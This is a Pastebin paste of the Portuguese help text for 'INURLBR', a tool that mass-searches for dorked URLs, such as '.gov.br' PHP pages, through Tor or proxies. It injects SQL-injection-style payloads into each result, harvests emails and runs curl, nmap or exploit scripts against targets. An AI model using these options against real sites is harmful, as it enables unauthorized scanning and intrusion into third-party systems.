Advertisement
Googleinurl

Menu SCANNER INURLBR - pt-br

Jul 16th, 2014
1,493
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.15 KB | None | 0 0
  1. -h Ajuda
  2. --help Ajuda
  3. --ajuda Ajuda
  4. -q Define motor de busca 1,2,3,4,5,6,7,8,9,10,11,12,13,all cada número é referente um motor.
  5. [opções]:
  6. 1 - www.google.com.br
  7. 2 - www.bing.com
  8. 3 - br.search.yahoo.com
  9. 4 - www.ask.com
  10. 5 - search.hao123.com.br
  11. 6 - ajax.googleapis.com
  12. 7 - search.lycos.com
  13. 8 - busca.uol.com.br
  14. 9 - us.yhs4.search.yahoo.com
  15. 10 - pesquisa.sapo.pt
  16. 11 - www.dmoz.org
  17. 12 - www.gigablast.com
  18. 13 - web.search.naver.com
  19. all - todos motores de busca
  20. Default: 1
  21. Exemplo: -q {op}
  22. Uso: -q 1
  23. -q 5
  24. Múltiplos motores -q 1,2,5,6,11
  25. Todos motores -q all
  26.  
  27. -p Define proxy para camuflagem envio de request para o motor de busca e para alvo-exploit.
  28. Exemplo: -p {proxy:porta}
  29. Uso: -p localhost:8118
  30. -p socks5://googleinurl@localhost:9050
  31. -p http://admin:12334@172.16.0.90:8080
  32.  
  33. --tor-random habilita a função tor randômico, a cada execução do script o tor muda de ip.
  34.  
  35. -t Define que tipo de validação o script vai efetuar op 1,2,3
  36. [opções]:
  37. 1 - Tipo 1 valida erros padrões do script
  38. injeta & concatena exploit apartir do host & gets.
  39. demonstrativo: www.alvo.com.br/pasta/index.php?id={exploit}
  40.  
  41. 2 - Tipo 2 valida o erro definido na opção -a='ALGO_DENTRO_ALVO'
  42. injeta & concatena exploit apartir do host & gets.
  43. demonstrativo: www.alvo.com.br/pasta/index.php?id={exploit}
  44.  
  45. 3 - Tipo 3 valida erro definido na opção -a='ALGO_DENTRO_ALVO' & erros padrão script.
  46. injeta & concatena exploit apartir do host.
  47. demonstrativo: www.alvo.com.br{exploit}
  48. Default: 1
  49. Exemplo: -t {op}
  50. Uso: -t 1
  51.  
  52. ERRO PADRÃO SCRIPT:
  53. ERRO MYSQL,ERRO MICROSOFT,ERRO ORACLE,ERRO POSTGRESQL,
  54. ZEND FRAMEWORK,ERRO PHP,ERRO ASP,ERRO LUA,ERRO INDEFINIDOS
  55.  
  56. --dork Define a dork que vai ser buscada nos motores.
  57. Exemplo: --dork {dork}
  58. Uso: --dork 'site:.gov.br inurl:php? id'
  59. - Usando múltiplas dorks.
  60. Exemplo: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
  61. Uso: --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
  62.  
  63. --exploit-get Define exploit via get será injetado a cada URL encontrada.
  64. Exemplo: --exploit-get {exploit_get}
  65. Uso: --exploit-get '?´0x27;'
  66.  
  67. --exploit-post Define exploit via post será injetado a cada URL encontrada.
  68. Exemplo: --exploit-post {exploit_post}
  69. Uso: --exploit-post 'campo1=valor1&campo2=valor2&campo3=?´0x273exploit;&botao=ok'
  70.  
  71. --exploit-comand Define exploit/parâmetro será executado nas opções --comand-vul/--comand-all.
  72. O exploit-comand será indentificado nos parâmetros --comand-vul/--comand-all como _EXPLOIT_
  73. Ex --exploit-comand '/admin/config.conf' --comand-all 'curl -v _TARGET__EXPLOIT_'
  74. _TARGET_ é URL/ALVO capturado pelo processo.
  75. _EXPLOIT_ é exploit/parâmetro definido na opção --exploit-comand.
  76. Exemplo: --exploit-comand {exploit-comand}
  77. Uso: --exploit-comand '/admin/config.conf'
  78.  
  79. -a Define procurar string que será procurada dentro de cada URL encontrada.
  80. Exemplo: -a {string_procurada}
  81. Uso: -a '<title>ola mundo</title>'
  82.  
  83. -d Define o nível de debug na execução do script op 1,2,3,4,5,6
  84. Exemplo: -d {op}
  85. Uso: -d 1 /URL motor de busca.
  86. -d 2 /Mostra toda url executada.
  87. -d 3 /Request detalhada de cada URL encontrada.
  88. -d 4 /Mostra html de cada url executada.
  89. -d 5 /Request detalhada de todas urls.
  90.  
  91. -s Define arquivo de saida onde vai ser salvadas as URLS vulneráveis.
  92. Exemplo: -s {arquivo}
  93. Uso: -s seu_arquivo.txt
  94.  
  95. -o Define arquivo que vai possibilitar execucação de testes com base em arquivo,
  96. Sem motor de busca.
  97. Exemplo: -o {arquivo_minhas_urls}
  98. Uso: -o testes.txt
  99.  
  100. -m Habilita buscar lista de emais dentro das alvos/urls encontrdas.
  101.  
  102. -u Habilita buscar lista de URL dentro dos alvos/urls encontrdas.
  103.  
  104. --comand-vul Executa comandos no terminal para cada alvos/URL encontrada vulnerável.
  105. Exemplo: --comand-vul {comando}
  106. Uso: --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
  107. --comand-vul './exploit.sh _TARGET_ output.txt'
  108.  
  109. --comand-all Executa comandos no terminal para todas URLS encontradas.
  110. Exemplo: --comand-all {comando}
  111. Uso: --comand-all 'nmap sV -p 22,80,21 _TARGET_'
  112. --comand-all './exploit.sh _TARGET_ output.txt'
  113.  
  114. Observação:
  115.  
  116. _TARGET_ será substituído por pelo URL/alvo encontrado, porem formatado sem
  117. os gets & pastas será executado somente o domínio.
  118.  
  119. _TARGETFULL_ será substituído por pelo URL/alvo encontrado será mantido a URL/alvo original encontrada.
  120.  
  121. _EXPLOIT_ será substituído pelo valor definido na opção --exploit-comand.
  122. O exploit-comand será indentificado nos parâmetros --comand-vul / --comand-all como _EXPLOIT_
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement